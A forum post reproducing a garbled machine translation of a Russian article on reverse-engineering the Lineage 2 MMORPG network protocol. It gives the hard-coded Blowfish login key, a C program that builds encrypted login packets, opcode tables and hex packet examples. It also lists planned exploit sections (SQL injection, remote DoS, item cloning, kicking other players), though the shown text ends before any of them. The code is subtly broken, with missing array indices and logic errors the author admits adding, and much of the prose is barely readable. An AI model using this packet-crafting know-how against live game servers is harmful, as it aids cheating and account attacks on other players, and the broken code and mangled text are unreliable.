Jump to content

Can anyone translate it?


Recommended Posts

I. introduction

 

II. Login-server

 

1. Enciphering of packages

2. Structure of packages

3. The designer of RequestAuthLogin-packages on C

 

III. Game-server.

 

1. Process of authorization on a server

2. Enciphering of packages

3. Report

4. xID and ObjectID

5. Examples of packages:

 

a) buying up/sale

b) private messages

d) we speak with NPC on an example of learning skills

 

IV. Problems and as it is possible to use them

 

1. Absence of a limit on quantity attempts of authorization

2. Enciphering of packages

3. The removed definition of the version lineage2 a server

4. Removed "suspension" of a login-server

5. Cloning

6. Creation of "mutants" and mixture скиллов

7. Immortality

8. ' remote DoS' also that gives it

9. integer overflow in a network cursor l2j

10. SQL-injection

11. Enchant (or a fairy tale about 100 % enchant)

12. Geodate (circulation through walls)

13. Jokes with SocialAction (0x1b)

14. A bug with Ride (0x6a) 15. We throw out from game chars

16. A bug with RequestRestartPoint (revival and runaway from prison)

17. To undress the another's character not knowing neither a login, nor the password - unless it it is real?

18. Result

 

V. Bugs of new generation

 

VI. Pair words about æ4

 

VII. An epilogue

 

VIII. References

 

IX. Appendices to clause

 

 

 

I. Introduction.

 

What is lineage? This is the representative of a modern game - MMORPG (Massively Multiplayer Online Role-Playing Game).

I even would tell one of the most successful and popular, if not most =).

Certainly, it is difficult to speak about popularity of this game since to count exact quantity "involved" in lineage, probably, it is impossible, but such servers as www.lineageii.ru (with as much as possible registered online in 10 000 person) and official www.lineage2.com (with all 100 000, that it paid) let know that the figure should be impressive. The essence of game consists that (as well as in any another RPG) you have a character and the huge world in whom need to be extracted money, clothes, the weapon, experience. Finally to fight with same as you players and to amuse the vanity victories. To some people at whom well it is not got on in any way real.

To some people at whom well the real life is not got on in any way, it allows realisation in the virtual world - to become the known soldier and even to find the bride (yes, girls in lineage plays too much). Among all others online (and not only online) games, lineage bribes the graphics. Personally firstly it seemed to me improbable, that someone could create such wonderful three-dimensional beauty for simple game. But is at game and the dark parties(sides). First, it has property to tighten(delay). And not easier(simply) to tighten(delay), and to cause dependence from which it is the extremely complex(difficult) to struggle. Secondly, understand, in the industry in which turn hundred thousand игроманов from practically all layers of a society, business without money will not manage (as well as all in our life). In fact some people having family, work, simply do not have time for that months to pump over the character up to the necessary level. Such геймерская the layer has given birth persons who have started to sell game levels and things for real money, having created that to a new niche in the world lineage. At present, depending on size of a server (and рейтов), cost of well dressed character of a high level can vary from 300 $ (on dying www.antaras.ru) up to 5 000 $ on an official server. Most jokes-it is purchase of things at administration of this or that server. Ponder, the gamer pays N-th quantity(amount) of the killed raccoons for that the administrator has added 1 record in a database of game. Here is how make money of air. That, I something has taken a great interest in the description of game) Affect year, on it spent. Certainly, in the similar industry (where are twirled money and a cloud naive and, at times silly gamers) business without us - inquisitive minds- cannot manage. Someone buys characters, someone creates and pumps over itself, we choose the third, not blazed way. The matter is that for some years of existence of this game, in it has not been found not to one vulnerability (except for especially game bugs), for it has not been written not one program, which could open to malefactors access to another's accounts. And know why? It seems to Me, young, not skilled (which posts dazzles bugtraq) pushed away malicious enciphering packages in lineage. And, even in the deciphered kind, they represent a chaotic character set. Perhaps, old men remember my clause(article) about the report of client-server interaction and vulnerability Half-Life (www.securitylab.ru/analytics/216301.php). The purpose of that clause was to describe game and to give on a saucer almost everything that I have reached(achieved) in its(her) studying. In same clause I shall tell as to decipher traffic lineage2, I shall tell a little about features of the report, well and I shall give some operating time (as and another's), all rest I shall not publish, as general use of this can lead to chaos in this fine, balanced and quite generated virtual world =)

 

ATTENTION.

1. At once I warn, I shall sometimes come back to article about half-life for analogies will help you to understand easier written. And to me to write easier.

2. Article was written on the basis of the analysis of the deciphered packages and studying of an initial code lineage2 a server l2j, written on java. Accordingly, article 100 of % is valid for l2j, and for official so, how much(as far as) l2j is valid for it =)

3. All source codes are written under linux. For compilation it is necessary lib blowfish. Libs from openssl package will approach at small updating a code.

4. By the way about updating a code. In the source codes given in article, there are small mistakes in logic to exclude their thoughtless use. If you will penetrate into article and fixing they will not be a problem.

5. And the last. The full version of article was accessible long time only to the limited number of people and with an exit с4 to the version lineage2 and fixs the majority of bugs sharply obsoletly. About С4 I shall tell a little in the end.

 

II. A Login-server.

 

Introduction. We shall begin that developers lineage2 have separated a login a server from game more less to unload and without that the hammered channel of a game server. Besides the login a server has property to hang (and, it has begun with с3 versions lineage and proceeds to this day) and to not start up users on a server. But those who already play, do not test absolutely any discomfort =) And owing to out all of the same gays which could find and distinctly explain to developers where all the bug has crept in, it remains till now not fixed. And so, not looking at all charm of idea with unloading the game channel, our domestic administrators persistently mould a login a server on one machine together with game.

 

1. Enciphering of packages.

 

For enciphering packages which the login-server exchanges with the client, lineage uses blowfish. Yes, that algorithm which has been developed by Bruce Shnejerom in 1993. About blowfish it is important to know, that it is the symmetric block code. Symmetric - means, that the algorithm uses 1 confidential key by which data encrypt/decrypt will be decoded. And if to speak particularly about blowfish on the basis of this key are generated 18 32-bit keys and 4 matrixes in the size of 256 32-bit words everyone. By which data, in turn, encrypt.will be decoded. The block code - means, that blowfish processes given by blocks (on 8 bytes). And still it means, that if integrity шифротекста has been broken, we in a any way can restore a part. With reference to lineage, it is necessary to tell, that a key on the basis of which are generated connect, is a constant and it is precisely registered in source codes l2j (here on what 99 % of researchers lineage which assumed were strewed, that the key should be transferred in one of packages - see references in the end). Still it is important to note that the first 2 byte data of a package are not ciphered. With enciphering, I think, we have understood. We go further.

 

 

2. Structure of packages.

 

First two byte a package (what are not ciphered) contain length of data of a package (as well as in halflife). The following byte bears in itself the information on type of a package.

 

The login-server processes packages:

0x00 - RequestAuthLogin (the inquiry about authorization - contains a login and the password)

0x02 - RequestServerLogin (inquiry about call about a server)

0x05 - RequestServerList (inquiry about the list of servers) On the others it simply does not answer, leaving only record in broad gullies.

 

The client processes packages of following types:

0x01 - authorization has not passed

0x03 - you are successfully authorized

0x04 - the answer on RequestServerLogin

0x06 - the answer on RequestServerList

 

And also a little bit additional packages about a bath of an account, check of the version and тд - they are presented below. The following byte is additional to the above described inquiries. For example, if the server has answered us inquiry of authorization with a package of type 0x01, the following byte will contain the reason, on which authorization has not passed (for us are important: 0x03 - an incorrect login or the password, 0x07 - someone already use the account, 0x11 - is established the temporary password). But actually this byte any more absolutely service. For example, in RequestAuthLogin packages from it byte the login begins. Further there is ¡-th of byte which any more are not managing directors, and bear the information defined by type of a package. Well, for example, for "RequestAuthLogin" it is a field contains a login and the password. The important applicability the last have of 8 bytes of a package. They contain checksum all that goes up to them, except for besides first two bytes of a package. What image calculates this most checksum? From data 32-bit words are serially separated. The first XOR with the second. Result of this operation XOR with a following word and so on. The example of calculation checksum will be shown below.

 

3. The designer of packages on С.

 

With structure of packages we have understood, now it is possible to realize in programm everything, that was manual above.

Код:

 

 

/*

 

la2-example.c ~ LineAge2 c3 RequestAuthLogin packet constructor

 

Helps to understand lineage2 authentification.

 

darkgrey / m00.blackhat.ru

 

~broken

*/

 

#include "/usr/local/include/blowfish.h"

 

// length key

#define KEY_LEN 20

// Length RequestAuthLogin of a package is constant and equal AUTH_PKT_LEN + 2

#define AUTH_PKT_LEN 0x30

 

// Key on the basis of which are generated sub-keys (connect)

char key[] = "[;'.]94-31==-&%@!^+]";

 

// Structure bfkey which after generation sub-keys will contain 18 P sub-keys and 4 S matrixes

BF_KEY bfkey;

 

// Function which calculates checksum and inserts it into a package

int add_ckecksum(char *raw, int count) {

long chksum = 0L;

int i = 0;

long ecx;

for(i = 0; i < count; i += 4) {

ecx = raw;

ecx |= raw[i + 1];

ecx |= raw[i + 2];

ecx |= raw[i + 3];

chksum ^= ecx;

}

 

printf("checksum: 0x%x\n",chksum);

memcpy(raw+count, (char *)&chksum, 4);

}

 

// Adds a login and the password in a package (it is separated from the basic function from reasons readable)

int add_lp(char *raw, char *l, char *p) {

l[15] = '\0';

p[17] = '\0';

 

memcpy(raw+3,l,strlen(l));

memcpy(raw+17,p,strlen(p));

}

 

// Displays a package in a readable kind (for debugging)

int print_packet(char *raw, int len) {

int i, c = 0;

 

for(i=0;i<54;i++) printf("_");

 

for(i=0;i<len+2;i++) {

if((c % 0x10)==0) printf("\n0x%.2x | ", c);

printf("%.2x ",raw & 0xFF);

c++;

 

}

printf("\n\n");

}

 

// The main function which designs a package

int build_auth_packet(char *login, char *pwd) {

int count = AUTH_PKT_LEN / 8;

int i;

char packet_skeleton[] =

// packet skeleton RequestAuthLogin

"\x32\x00" // The length of a package is constant and equal 0x30 + 0x02

"\x00" // Type of a package (0x00 - RequestAuthLogin)

"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" // login

"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" // password

"\x08" // Means the end of section login/password

"\x00\x00\x00\x00\x00\x00\x00\x00" // in c3 not used(зарезервированно?)

"\x00\x00\x00\x00" // checksum

"\x00\x00\x00\x00";

 

// add login and pass to packet

add_lp(packet_skeleton, login, pwd);

 

// add checksum

add_ckecksum(packet_skeleton + 2, AUTH_PKT_LEN - 8);

 

printf("Auth packet dump (non-crypted):\n");

print_packet(packet_skeleton, AUTH_PKT_LEN);

 

// We cipher blocks on 8 bytes

for(i = 0; i < count; i++)

BF_encrypt((BF_LONG *)((short*)&packet_skeleton+1+i*4), &bfkey, BF_ENCRYPT);

 

printf("Auth packet dump (encrypted):\n");

print_packet(packet_skeleton,AUTH_PKT_LEN);

}

 

 

 

int main() {

char login[] = "m00", // test login

pwd[] = "ownzu"; // password

printf("\nla2-example.c ~ LineAge2 c3 RequestAuthLogin packet constructor\n\n");

 

// generate sub-keys

BF_set_key(&bfkey, KEY_LEN, key);

 

// We collect a package

build_auth_packet(login, pwd);

}

/* eof */

 

 

 

Here that on my boxing the program has displayed:

 

bash-2.05b$ ./a.out

 

la2-example.c ~ LineAge2 c3 RequestAuthLogin packet constructor

 

checksum: 0x224a0377

Auth packet dump (non-crypted):

______________________________________________________

0x00 | 32 00 00 6d 30 30 00 00 00 00 00 00 00 00 00 00

0x10 | 00 6f 77 6e 7a 75 00 00 00 00 00 00 00 00 00 00

0x20 | 00 08 00 00 00 00 00 00 00 00 77 03 4a 22 00 00

0x30 | 00 00

 

Auth packet dump (encrypted):

______________________________________________________

0x00 | 32 00 09 d9 97 e2 29 89 8c b5 1a a0 1a 83 74 43

0x10 | 39 fc 2f 03 c3 26 9c 65 b0 c4 20 28 11 c1 6a 95

0x20 | 3e 44 45 46 2a ae b9 18 91 2e 75 56 d0 dc 40 b5

0x30 | 77 2a

 

bash-2.05b$

 

III. A Game-server

 

1. Process of authorization on a login-server and call on a game-server.

 

Authorization on a login a server occurs in some stages.

1) a login the server sends us a greeting in the form of a package in length of 11 bytes (in general it contains the information on the version).

2) we answer it RequestAuthLogin with inquiry

3) if the password true, sends us a package with 32 bit number of our account (it always constant) - we shall call SessionKey *1.

4) we send it RequestServerList, on what the server answers us the list of servers containing game, ports, number of playing users, the maximal number of users.

5) we send RequestServerLogin, on what the server checks ours AccessLevel (if it is equal-1, means we banned) and depending on our login, the password, a level of access and a socket, generates unique 32-bit SessionKey *2 on which in a consequence we will be authorized with a game-server. If the game server in down, simulates this condition (administrators do it for work on a server) or is simply full, refuses to accept us.

6) if all is good, we climb on a game server. We send it a certain package (for everyone C3 a server it the, but constant), on what it answers 12 byte with a package containing first 4 bytes of key which it is fastened to others 4 bytes (which are constant) and is received 64 a bit key. In the further we shall use it for decoding and coding game packages. It is important to note, that with everyone of races coded a package, its length increases to the first part of a key.

7) we send it a login and two identifiers (already in the ciphered kind) which we have received in a session with a login-server. In the answer we receive the list of characters. Here so, in 7 stages we shall be authorized on a server =) Difficultly, but it is safe. Probably, someone from you had a question: and whether probably to come on a game server directly? Without participation a login of a server. About it I shall write below.

 

2. Enciphering packets

 

As I already wrote enciphering of packages above, for enciphering game packages lineage uses a 64-bit key. The first it 4 byte undertake from the very first package of the game-server, the second. N-th symbol from a clear text, XOR's with N-th byte a key further undertakes. In parallel with it XOR's (N-1)-th symbol from a clear text on 0xFF. Above results of both calculations operation " digit-by-digit And " is spent. And on such algorithm each symbol since the first is ciphered. As you can see, as each subsequent symbol will be ciphered, depends from previous. And it means, that if at us the first part of a package is for whatever reasons damaged, or it simply is not present, decipher the second part we cannot. Well it so, to a word. Actually it for us is not important. Still it is important to note that the first part of a key variable. With each new deciphered package, to the first I 4 byte the length of these to data increases. That is, having an initial key (at the moment of connection with a login a server) and, having pulled out a package during the certain moment from a session with a game-server decipher it we cannot. For this purpose we need to restore all packages which were up to it. Basically, quantity of possible combinations of a key of equally ~423 million. In view of simplicity of algorithm, modern computers can make somewhere 10 000 iterations in a second (can even more) and to find a key a maximum for 12 hours. But for this purpose we need to know even about the maintenance of a package. For what authors have made a key to variables? I think, all it is clear, with a view of safety. Though, it is a question about TCP (instead of about UDP as in the same halflife) in which someone stranger "to put" in a session extremely inconveniently.

4.Protocol.

 

As well as in packages of the login-server, first two byte are allocated towards the length. Further the byte means type of a package. Here on types of packages which the client lineage2 (should process C3 the some people I shall make comments):

Код:

 

// sends a login-server

0x01 loginfail2

0x02 accountKicked1

0x03 loginok

0x04 serverlist

0x05 serverfail

0x06 playfail

0x07 playok

0x08 accountKicked

0x09 blockedAccMsg // banned

0x20 protocol version different

0x00 VersionCheck

 

// Sends a game-server

0x01 MoveToLocation

0x02 NpcSay

0x03 CharInfo // Means surrounding characters

0x04 UserInfo

0x06 Attack

0x07 Attack

0x08 Attacked

0x09 Attacked

0x0a AttackCanceld

0x0b Die

0x0c Revive

0x0d AttackOutOfRange

0x0e AttackInCoolTime

0x0f AttackDeadTarget

0x10 LeaveWorld

0x11 AuthLoginSuccess

0x12 AuthLoginFail

0x13 CharList // The chars list

0x15 SpawnItem // On the some people C3 the answer to a choice char

0x16 DropItem // On the some С3 transfers info about mob

0x17 GetItem

0x18 EquipItem

0x19 UnequipItem

0x1a StatusUpdate

0x1b NpcHtmlMessage // To the some people C3 transfers the list clothes with ItemID and them ObjectID 0x1c SellList

0x1d BuyList

0x1e DeleteObject

0x1f CharSelectInfo

0x20 LoginFail

0x21 CharSelected

0x22 NpcInfo

0x23 NewCharacterSuccessPacket

0x24 NewCharacterFailPacket

0x25 CharCreateOk

0x26 CharCreateFail

0x27 ItemList

0x28 SunRise

0x29 SunSet

0x2a EquipItemSuccess // Has become outdated

0x2b EquipItemFail // Has become outdated

0x2c UnEquipItemSuccess // Has become outdated

0x2d UnEquipItemFail // Has become outdated

0x2e TradeStart

0x2f TradeStartOk // Has become outdated

0x30 TradeOwnAdd

0x31 TradeOtherAdd

0x32 TradeDone

0x33 CharDeleteSuccess

0x34 CharDeleteFail

0x35 ActionFail

0x36 ServerClose

0x37 InventoryUpdate

0x38 TeleportToLocation

0x39 TargetSelected

0x3a TargetUnselected

0x3b AutoAttackStart

0x3c AutoAttackStop

0x3d SocialAction

0x3e ChangeMoveType

0x3f ChangeWaitType

0x40 NetworkFail // Has become outdated

0x43 CreatePledge

0x44 AskJoinPledge

0x45 JoinPledge

0x46 WithdrawalPledge

0x47 OustPledgeMember

0x48 SetOutPledgeMember

0x49 DismissPledge

0x4a SetDismissPledge

0x4b AskJoinParty

0x4c JoinParty

0x4d WithdrawalParty

0x4e OustPartyMember

0x4f SetOustPartyMember

0x50 DismissParty

0x51 SetDismissParty

0x52 MagicAndSkillList

0x53 WarehouseDepositList

0x54 WarehouseWithdrawalList

0x55 WarehouseDone

0x56 ShortCutRegister

0x57 ShortCutInit

0x58 ShortCutDelete

0x59 StopMove

0x5a MagicSkillUser

0x5b MagicSkillCanceld

0x5d CreatureSay

0x5e EquipUpdate

0x5f StopMoveWithLocation

0x60 DoorInfo

0x61 DoorStatusUpdate

0x63 PartySmallWindowAll

0x64 PartySmallWindowAdd

0x65 PartySmallWindowDeleteAll

0x66 PartySmallWindowDelete

0x67 PartySmallWindowUpdate

0x68 PledgeShowMemberListAll

0x69 PledgeShowMemberListUpdate

0x6a PledgeShowMemberListAdd

0x6b PledgeShowMemberListDelete

0x6c MagicList // Has become outdated

0x6d SkillList

0x6e VehicleInfo

0x6f VehicleDeparture

0x70 VehicleCheckLocation

0x71 GetOnVehicle

0x72 GetOffVehicle

0x73 TradeRequest

0x74 RestartResponse

0x75 MoveToPawn

0x76 SetTo

0x77 StartRotating

0x78 FinishRotating

0x79 MoveBackwardToLocation // Is available in view of skill or to_the_nearest_village after death

0x7a SystemMessage

0x7d StartPledgeWar

0x7e ReplyStartPledgeWar

0x7f StopPledgeWar

0x80 ReplyStopPledgeWar

0x81 SurrenderPledgeWar

0x82 ReplySurrenderPledgeWar

0x83 SetPledgeCrest // Has become outdated

0x84 PledgeCrest

0x85 SetupGauge

0x86 ShowBoard

0x87 ChooseInventoryItem

0x89 MoveToLocationInVehicle

0x8a StopMoveInVehicle

0x8b ValidateLocationInVehicle

0x8c TradeOtherAdd2

0x8d TradePressOwnOK // Has become outdated

0x8e MagicSkillLaunched

0x8f FriendAddRequestResult

0x90 FriendAdd // Has become outdated

0x91 FriendRemove // Has become outdated

0x92 FriendList // Has become outdated

0x93 FriendStatus // Has become outdated

0x94 TradePressOtherOk // Has become outdated

0x95 FriendAddRequestResult2

0x96 LeaveWorld2

0x97 AbnormalStatusUpdate

0x98 QuestList

0x99 EnchantResult

0x9a AuthServerList // Has become outdated

0x9b PledgeShowMemberListDeleteAll

0x9c PledgeInfo

0x9d PledgeExtendedInfo

0x9e SurrenderPersonally

0x9f Ride

0xa1 PledgeShowInfoUpdate

0xa2 ClientAction

0xa3 AquireSkillList

0xa4 AquireSkillInfo

0xa5 ServerObjectInfo

0xa6 HideGm

0xa7 AquireSkillDone

0xa8 GMViewCharacterInfo

0xa9 GMViewPledgeInfo

0xaa GMViewSkillInfo

0xab GMviewMagicInfo

0xac GMViewQuestInfo

0xad GMViewItemList

0xae GMViewWarehouseWithdrawList

0xaf PartyMatchList

0xb0 PartyMatchDetail

0xb1 PlaySound

0xb2 StaticObject

0xb3 PrivateSellList2

0xb4 PrivateBuyList2

0xb5 PrivateStoreMsg

0xb6 ShowMinimapPacket

0xb7 ReviveRequest // Has become outdated

0xb8 AbnormalVisualEffect

0xb9 TutorialShowHtml

0xba TutorialShowQuestionMark

0xbb TutorialEnableClientEvent

0xbc TutorialClose

0xbd ShowRadar

0xbe DeleteRadar

0xbf MyTargetSelected

0xc0 PartyMemberPosition

0xc1 AskJoinAlliance

0xc2 JoinAlliance

0xc3 WithdrawAlliance

0xc4 OustAllianceMemberPledge

0xc5 DismissAlliance

0xc6 SetAllianceCrest // Has become outdated

0xc7 ReceiveAllyCrest

0xc8 ServerCloseSocket // Has become outdated

0xc9 PetStatusShow

0xca PetInfo

0xcb PetItemList

0xcc PetInventoryUpdate

0xcd AllianceInfo // Has become outdated

0xce PetStatusUpdate

0xcf PetDelete

0xd0 PrivateSellList

0xd1 PrivateBuyList

0xd2 PrivateStoreMsg

0xd3 VehicleStart

0xd4 RequestTimeCheck

0xd5 StartAllianceWar

0xd6 ReplyStartAllianceWar // Has become outdated

0xd7 StopAllianceWar

0xd8 ReplyStopAllianceWar // Has become outdated

0xd9 SurrenderAllianceWar // Has become outdated

0xda SkillCoolTimePacket

0xdb PackageToListPacket

0xdc PackageSendableListPacket

0xdd EarthQuake

0xde FlyToLocation

0xdf BlockList // Has become outdated

0xe0 SpecialCamera

0xe1 NormalCamera

0xe2 CastleSiegeInfoPacket

0xe3 CastleSiegeAttackerList

0xe4 CastleSiegeDefenderList

0xe5 NickNameChanged

0xe6 PledgeStatusChanged

0xe7 RelationChanged

0xe8 OnEventTrigger

0xe9 MultiSellListPacket

0xea SetSummonRemainTime

0xeb OnSkillRemainSec

0xec NetPingPacket

 

 

 

From the client to a server:

Код:

 

0x01 MoveBackwardToLocation

0x02 Say

0x03 EnterWorld

0x04 Action

0x08 RequestAuthLogin

0x09 Logout

0x0a Attack

0x0b CharacterCreate

0x0c CharacterDelete

0x0d CharacterSelect

0x0e NewCharacter

0x0f ItemList

0x10 RequestEquipItem

0x11 RequestUnEquipItem

0x12 RequestDropItem

0x12 RequestDropItemFromPet

0x14 UseItem

0x15 TradeRequest

0x16 AddTradeItem

0x17 TradeDone

0x1a RequestTeleport

0x1b SocialAction

0x1c ChangeMoveType // Has become outdated. Now used 'RequestActionUse'

0x1d ChangeWaitType // Has become outdated. Now used 'RequestActionUse'

0x1e RequestSellItem

0x1f RequestBuyItem

0x20 RequestLinkHtml

0x21 RequestBypassToServer

0x22 RequestBBSwrite

0x23 RequestCreatePledge

0x24 RequestJoinPledge

0x25 RequestAnswerJoinPledge

0x26 RequestWithDrawalPledge

0x27 RequestOustPledgeMember

0x28 RequestDismissPledge

0x29 RequestJoinParty

0x2a RequestAnswerJoinParty

0x2b RequestWithDrawalParty

0x2c RequestOustPartyMember

0x2d RequestDismissParty

0x2e RequestMagicSkillList

0x2f RequestMagicSkillUse

0x30 Appearing

0x31 SendWareHouseDepositList

0x32 SendWareHouseWithDrawList

0x33 RequestShortCutReg

0x34 RequestShortCutUse

0x35 RequestShortCutDel

0x37 RequestTargetCancel

0x38 Say2 // private (on some servers - la2.ru - used 0x39)

0x3c RequestPledgeMemberList

0x3e RequestMagicList

0x3f RequestSkillList

0x41 MoveWithDelta

0x42 GetOnVehicle

0x43 GetOffVehicle

0x44 AnswerTradeRequest

0x45 RequestActionUse

0x46 RequestRestart

0x47 RequestSiegeInfo

0x48 ValidatePosition

0x49 RequestSEKCustom

0x4a StartRotating

0x4b FinishRotating

0x4d RequestStartPledgeWar

0x4e RequestReplyStartPledgeWar

0x4f RequestStopPledgeWar

0x50 RequestReplyStopPledgeWar

0x51 RequestSurrenderPledgeWar

0x52 RequestReplySurrenderPledgeWar

0x53 RequestSetPledgeCrest

0x55 RequestGiveNickName // In general used for installation title CL's. Can for what…

0x57 RequestShowboard

0x58 RequestEnchantItem

0x59 RequestDestroyItem

0x5b SendBypassBuildCmd

0x5e RequestFriendInvite

0x5f RequestFriendAddReply

0x60 RequestFriendList

0x61 RequestFriendDel

0x62 CharacterRestore

0x63 RequestQuestList

0x64 RequestDestroyQuest

0x66 RequestPledgeInfo

0x67 RequestPledgeExtendedInfo

0x68 RequestPledgeCrest

0x69 RequestSurrenderPersonally

0x6a Ride

0x6b RequestAcquireSkillInfo

0x6c RequestAcquireSkill

0x6d RequestRestartPoint

0x6e RequestGMCommand

0x6f RequestPartyMatchConfig

0x70 RequestPartyMatchList

0x71 RequestPartyMatchDetail

0x72 RequestCrystallizeItem

0x73 RequestPrivateStoreManage

0x74 SetPrivateStoreList

0x75 RequestPrivateStoreManageCancel

0x76 RequestPrivateStoreQuit

0x77 SetPrivateStoreMsg

0x78 RequestPrivateStoreList

0x79 SendPrivateStoreBuyList

0x7a ReviveReply

0x7b RequestTutorialLinkHtml

0x7c RequestTutorialPassCmdToServer

0x7d RequestTutorialQuestionMark

0x7e RequestTutorialClientEvent

0x7f RequestPetition

0x80 RequestPetitionCancel

0x81 RequestGMList

0x82 RequestJoinAlly

0x83 RequestAnswerJoinAlly

0x84 RequestWithdrawAlly

0x85 RequestOustAlly

0x86 RequestDismissAlly

0x87 RequestSetAllyCrest

0x88 RequestAllyCrest

0x89 RequestChangePetName

0x8a RequestPetUseItem

0x8b RequestGiveItemToPet

0x8c RequestGetItemFromPet

0x8e RequestAllyInfo

0x8f RequestPetGetItem

0x90 RequestPrivateStoreBuyManage

0x91 SetPrivateBuyList

0x92 RequestPrivateStoreBuyManageCancel

0x93 RequestPrivateStoreBuyQuit

0x94 SetPrivateBuyMsg

0x95 RequestPrivateStoreBuyList

0x96 SendPrivateStoreBuyBuyList

0x97 SendTimeCheckPacket

0x98 RequestStartAllianceWar

0x99 ReplyStartAllianceWar

0x9a RequestStopAllianceWar

0x9b ReplyStopAllianceWar

0x9c RequestSurrenderAllianceWar

0x9d RequestSkillCoolTime

0x9e RequestPackageSendableItemList

0x9f RequestPackageSend

0xa0 RequestBlock

0xa1 RequestCastleSiegeInfo

0xa2 RequestCastleSiegeAttackerList

0xa3 RequestCastleSiegeInfo

0xa4 RequestJoinCastleSiege

0xa5 RequestConfirmCastleSiegeWaitingList

0xa6 RequestSetCastleSiegeTime

0xa7 RequestMultiSellChoose

0xa8 NetPing

 

 

 

As you can see, the majority of client packages begins with word Request that is translated as "inquiry". Yes, really, all process of game looks approximately so: the server constantly transfers us a condition of the world, position of

Mobs/players/npc and others. We when something should (be gone, attacked and other) transfer "inquiry". All is very simple. 4. XID and ObjectID each thing (the subject, NPC) in game has the 16/32 bit the identifier (trades - 8 bit). Its sense that, you see, it is more convenient to transfer on a network 2/4 byte number, than a phrase of N length like: " Crystal Scroll: Enchant Weapon (Grade B) " or nickname NPC like " Magister MacTePqpJlOMaCTeP ". As you understand, it serves for identification of this or that object. The list of these identifiers and NPC/subjects corresponding them to be stored and on a server and the client, and among themselves they is not synchronized in any way. That is, if to replace this table on a server it is necessary патчить and the client is one of the reasons, why at each server the patch.

 

 

Besides this identifier is still 32 bit Object ID. After call in the game world, a server appropriates to each of subjects which are at the Persian, unique OID. And OID each subsequent subject is OID current-1. That is OID it is generated at all random, and under the order. After assignment, OID it is reserved, so that anybody has not managed any more to receive similar. This information, by the way, is not confirmed by source codes, that is is my own conclusion. If it not so, on proprocession of a full circle (from 0xFFFFFFFF up to 0x00000000) it can it will turn out so, that already borrowed OID it will be appropriated to a new belonging, that will lead to unknown consequences (to an opportunity of cloning or simple falling of a server). But a problem that range OID enough big:) And if to be more exact, it is necessary to appropriate OID to ~4.3 billion things to pass a full circle, what even on a server with mega-online will borrow N of days (and can also weeks). Still time I shall repeat, this all the assumption. But the matter is that I, for example, Did not see some la2 server (even off) with uptime more than week. The problem just in it can? And as a whole, OID it is necessary for struggle against cloning. To be exact with revealing of this. As to NPC, OID at them stands out under the same law, but at occurrence NPC in the world. With OID characters the same.

 

5. Examples of packages.

 

a) purchase of subjects to put on buying up a subject, we need to take advantage with 3 of packages. The first 0x94 (SetPrivateBuyMsg). Apparently from the name it establishes that message which will be is deduced above a head at the Persian during the moment of trade (what on a yellow background). Here an example:

Код:

 

// SetPrivateStoreBuyMsg a package

 

XX XX // the Size of data

94 // type of a package

41 00 41 00 41 00 42 00 42 00 42 00 // the text. Symbols should be divided among themselves null-byte

00 00 // the end of a package

 

 

Further we use a package of type 0x91 (SetPrivateBuyList). In it just we transfer quantity of subjects, Item ID and the price. For example:

Код:

 

// SetPrivateStoreList a package

XX XX // the Size of data

91 // type of a package

01 00 00 00 // quantity of things

// the beginning of the block

e1 02 00 00 // Item ID

00 00 01 00 00 00 // how many subjects of the given type to buy up

e8 03 00 00 // the price

// the end of the block

 

 

 

 

I shall a little explain this package. We have put them on buying up 1 thing with IID 0x2e1 (Scroll of Resurrection) for 1000 аден. And last package of type 0x1d. It directly starts trade:

Код:

 

XX XX // the size of data

1d // type

01 00 00 00 // quantity

 

 

As to sale, there practically all same. Only instead of ' SetPrivateBuyMsg ' used ' SetPrivateStoreMsg ', and instead of ' SetPrivateBuyList ' - ' SetPrivateStoreList ' accordingly. And, nearly has not forgotten, instead of Item ID used Object ID because we sell any concrete subject.

 

b) private messages Here all is very simple.

Код:

 

XX XX // the size of data

38 // type of a package (Say2)

42 00 42 00 42 00 42 // the message (BBBB)

00 00 00 02 00 00 00 // breakspace=)

41 00 41 00 41 00 41 // nickname (АААА)

00 00 00 // the end

 

 

 

c) an example of a package in which the server transfers us the list of all subjects which are on чаре. And, this package assigns to everyone Item ID unique Object ID.

Код:

 

XX XX // length of a package

1b // type of a package (0x1b on antaras.ru)

00 00 05 00 // quantity of subjects

04 00 // type of a belonging

1e 26 14 40 // Object ID

d4 15 00 00 // Item ID (0x15d4 - Tutorial Guide)

01 00 00 00 // Quantity

05 00 00 00 00 00 00 00 00 00 00 00 00 00 // Enchanting, quest item, droped or not and still something

01 00 // type of a belonging

1d 26 14 40 // Object ID

7b 04 00 00 // Item ID (0x47b - Squire's pants)

01 00 00 00 // Quantity

01 00 00 00 00 00 00 08 00 00 00 00 00 00 01 00 // type of a belonging

1c 26 14 40 // Object ID

7a 04 00 00 // Item ID (0x47a - Squire's Shirt)

01 00 00 00 // Quantity

01 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 // type of a belonging

1b 26 14 40 // Object ID

0a 00 00 00 // Item ID (0x0a - dagger)

01 00 00 00 // Quantity 00 00 00 00 00 00 80 00 00 00 00 00 00 00 00 00 // type of a belonging

1a 26 14 40 // Object ID

42 09 00 00 // Item ID (0x942 - Guild Member's Club)

01 00 00 00 // Quantity

00 00 00 00 00 00 80 00 00 00 00 00 00 00

 

 

d) we speak with NPC on an example of learning skills For the beginning, we need to allocate NPC and to get with it dialogue:

04 // type of a package (Action)

51 14 10 48 // OID NPC

// further there are coordinates the character

c6 51 01 00 // X

52 45 02 00 // Y

b8 f2 ff ff // Z

00 // the end

[/code]

 

And unitary посылка this package - allocation NPC. To get with it dialogue, it is necessary to send this package still time. Further, when the window with a choice of dialogues opens and you choose item " Learn skills ", the client sends a server here such package:

 

Код:

 

21 // type of a package (RequestBypassToServer)

6c 00 65 00 61 00 72 00 6e 00 5f 00 73 00 6b 00 69 00 6c 00 6c 00 00 // learn_skill

00 // the end

 

 

After a call of dialogue with skills, you can or look the information on any skill by means of:

Код:

 

6b // type of a package (RequestAcquireSkillInfo)

10 00 00 00 // number of skill

09 00 00 00 // the level

 

 

to learn this skill, is sent precisely same package, but with type 0x63 (RequestAcquireSkill)

 

 

IV. Problems and as it is possible to use them

 

